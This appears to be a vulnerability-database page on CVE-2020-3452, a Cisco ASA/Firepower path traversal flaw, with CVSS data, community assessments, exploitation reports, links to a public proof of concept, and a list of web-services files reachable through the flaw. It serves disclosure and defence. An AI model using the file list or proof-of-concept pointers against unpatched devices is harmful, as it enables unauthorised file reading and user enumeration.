Attacker Value
Low
(3 users assessed)
Exploitability
Very High
(3 users assessed)
User Interaction
None
Privileges Required
None
Attack Vector
Network
6

CVE-2020-3452 Cisco ASA / Firepower Read-Only Path Traversal Vulnerability

Disclosure Date: July 22, 2020
Exploited in the Wild
Add MITRE ATT&CK tactics and techniques that apply to this CVE.
Execution
Techniques
Validation
Validated

Description

A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.

Add Assessment

7
Ratings
  • Attacker Value
    Very Low
  • Exploitability
    Very High
Technical Analysis

Nothing valuable was exposed by vulnerability, also it was not possible to expand the scope or weaponize it.
This module was also tested with no success: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/scanner/http/cisco_directory_traversal.md
PoC: https://twitter.com/aboul3la/status/1286012324722155525
https://www.youtube.com/watch?v=74ExOh6BVxk

File Entry Points:

logo.gif
http_auth.html
user_dialog.html
localization_inc.lua
portal_inc.lua
include
nostcaccess.html
ask.html
no_svc.html
svc.html
session.js
useralert.html
ping.html
help
app_index.html
tlbr
portal_forms.js
logon_forms.js
win.js
portal.css
portal.js
sess_update.html
blank.html
noportal.html
portal_ce.html
portal.html
home
logon_custom.css
portal_custom.css
preview.html
session_expired
custom
portal_elements.html
commonspawn.js
common.js
appstart.js
appstatus
relaymonjar.html
relaymonocx.html
relayjar.html
relayocx.html
portal_img
color_picker.js
color_picker.html
cedhelp.html
cedmain.html
cedlogon.html
cedportal.html
cedsave.html
cedf.html
ced.html
lced.html
files
pluginlib.js
shshim
do_url
clear_cache
connection_failed_form
apcf
ucte_forbidden_data
ucte_forbidden_url
cookie
session_password.html
tunnel_linux.jnlp
tunnel_mac.jnlp
sdesktop
gp-gip.html
auth.html
wrong_url.html
logon_redirect.html
logout.html
logon.html
test_chargen

5
Ratings
Technical Analysis

This just dropped from https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86

Noted by https://twitter.com/ptswarm/status/1285974719821500423

Looks like there is a PoC already, HT to @ccondon-r7 for spotting: https://twitter.com/aboul3la/status/1286012324722155525

Limited scope in the advisory seems to indicate nothing hugely important would be revealed by this vuln, but it is probably very dependent on the configuration and nature of any company’s particular deployment. And there tends to be a notion that once a path traversal vuln is found, folks often find new ways to expand their scope.

1
Ratings
Technical Analysis

SANS ISC has said they’re seeing “small numbers of exploit attempts.” The exploit they’ve detected is identifying vulnerable systems “by reading benign LUA source code files.”

https://isc.sans.edu/diary/26426

CVSS V3 Severity and Metrics
Base Score:
7.5 High
Impact Score:
3.6
Exploitability Score:
3.9
Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Attack Vector (AV):
Network
Attack Complexity (AC):
Low
Privileges Required (PR):
None
User Interaction (UI):
None
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
None
Availability (A):
None

General Information

Vendors

  • cisco

Products

  • adaptive security appliance software,
  • firepower threat defense

Exploited in the Wild

Reported by:
Technical Analysis

On July 22, 2020, Cisco published details on an unauthenticated path traversal vulnerability in the web services interface of their Adaptive Services Appliance (ASA) and Firepower Threat Defense products. Successful exploitation means a remote, unauthenticated attacker can read sensitive files on a target system. CVE-2020-3452 carries a CVSSv3 base score of 7.5. See Cisco’s advisory for full details.

A public proof-of-concept (PoC) for CVE-2020-3452 was released on July 22 by Ahmed Aboul-Ela, the researcher who discovered the vulnerability. There are community reports of opportunistic scanning for the vulnerability, though we do not yet have confirmation of successful widespread exploitation. Rapid7’s Project Sonar has detected more than 85,000 instances of Cisco ASA on the public internet; exposure data in this case is meant to offer a better understanding of known installations and does not imply vulnerability. See Rapid7’s blog for further exposure details.

Affected products include:

  • Cisco products running a vulnerable release of Cisco ASA Software or Cisco FTD Software with a vulnerable AnyConnect or WebVPN configuration. See the Vulnerable Products section of Cisco’s advisory for a table of vulnerable features and configurations: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86#vp
  • Cisco ASA Software releases 9.5 and earlier, as well as Release 9.7, along with Cisco FTD Release 6.2.2 have reached the end of software maintenance and organizations will have to upgrade to a later, supported version to fix this vulnerability.

Rapid7 analysis: CVE-2020-3452 is limited in scope and impact in that it merely allows an attacker to view files on the web services file system. The vulnerability neither gives an attacker code execution on a vulnerable target system nor offers access to ASA, FTD, or underlying operating system files. That said, the vulnerability is trivial to exploit and may yield information that aids in planning multi-step attacks. Enumerating users, for instance, is often a precursor to a brute force or password spraying attack. If an attacker is able to exploit a vulnerability like this one to build a user list, that attacker can then verify which users have VPN access and target those users specifically.

This latest vulnerability in Cisco’s ASA/Firepower products may also presage another wave of vulnerability research and exploit development attention aimed at CVE-2020-3187.

Guidance: Cisco has provided fixes for all supported versions of ASA and FTD components. Cisco ASA and Firepower customers should patch their installations as soon as is practical.